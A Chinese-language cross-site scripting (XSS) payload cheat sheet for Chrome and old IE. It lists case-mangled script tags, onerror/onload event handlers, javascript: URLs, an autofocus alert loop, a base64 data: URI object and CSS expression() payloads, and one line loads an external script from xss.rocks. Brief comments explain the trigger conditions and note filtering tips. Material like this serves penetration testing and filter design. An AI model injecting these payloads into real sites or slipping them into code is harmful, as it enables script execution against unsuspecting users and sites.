Chrome 下有效的 payload(是否触发取决于浏览器版本和注入上下文;页面启用了禁止内联脚本的 CSP 时,内联脚本、内联事件处理器和 javascript: URL 都不会执行):

<script >alert('XSS')</script >
<ScRipT>alert("XSS0")</ScRipT>
<<SCRIPT>alert("XSS1");//<</SCRIPT>
<SCRIPT/XSS SRC="https://xss.rocks/xss.js"></SCRIPT>
<ImG src onerror=alert('xxs3')>
<input type="image" src onerror="alert('xss')">
<sVg/onload=alert('XSS')>
<boDY onLOAD=alert('XSS')>
<a href="javascript:alert('xss')">xss link</a>
<a onmouseover="alert('xss')">xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=https://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>


//HTML5 新增的标签和属性
<form id="test"></form><button form="test" formaction="javascript:alert(123)">X</button>
<video src onerror=alert()></video>

//持续弹窗,停不下来:autofocus 让输入框在页面加载时自动获得焦点,alert 关闭后焦点回到输入框,onfocus 会再次触发
<input onfocus=alert(1) autofocus>

//img 标签必须带 src 属性(可以为空或无效值),onerror 才会触发:没有 src 时浏览器不会尝试加载图片,也就不会产生 error 事件
<img src=# onmouseover="alert('xxs2')">
<ImG src onerror=alert('xxs3')>
<iMg src=# onerror="alert('xxs3')">
<IMG src onerror="alert('xxs4')">
<IMg src="" onerror="alert('xxs5')">

//data: URI(base64 编码)。下面 EMBED 的 SRC 值在本页中为空;object 中的 base64 解码后是一段 <script> 弹窗代码,过滤时需要先对 data: URI 解码再检查
<EMBED SRC=""
type="image/svg+xml"AllowScriptAccess="always"></EMBED>

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>


//常见的事件处理属性(属性名不区分大小写;过滤时应采用白名单,而不是逐个屏蔽事件名)
onLoad
onError
onClick
onFocus
onMouseOver
onScroll

IE 下有效的 payload(CSS expression() 只有旧版 IE 支持,自 IE8 标准模式起已不再支持):

<XSS STYLE="xss:expression(alert('XSS'))">
<style>*{x:expression(alert('xss'))}</style>

json hijacking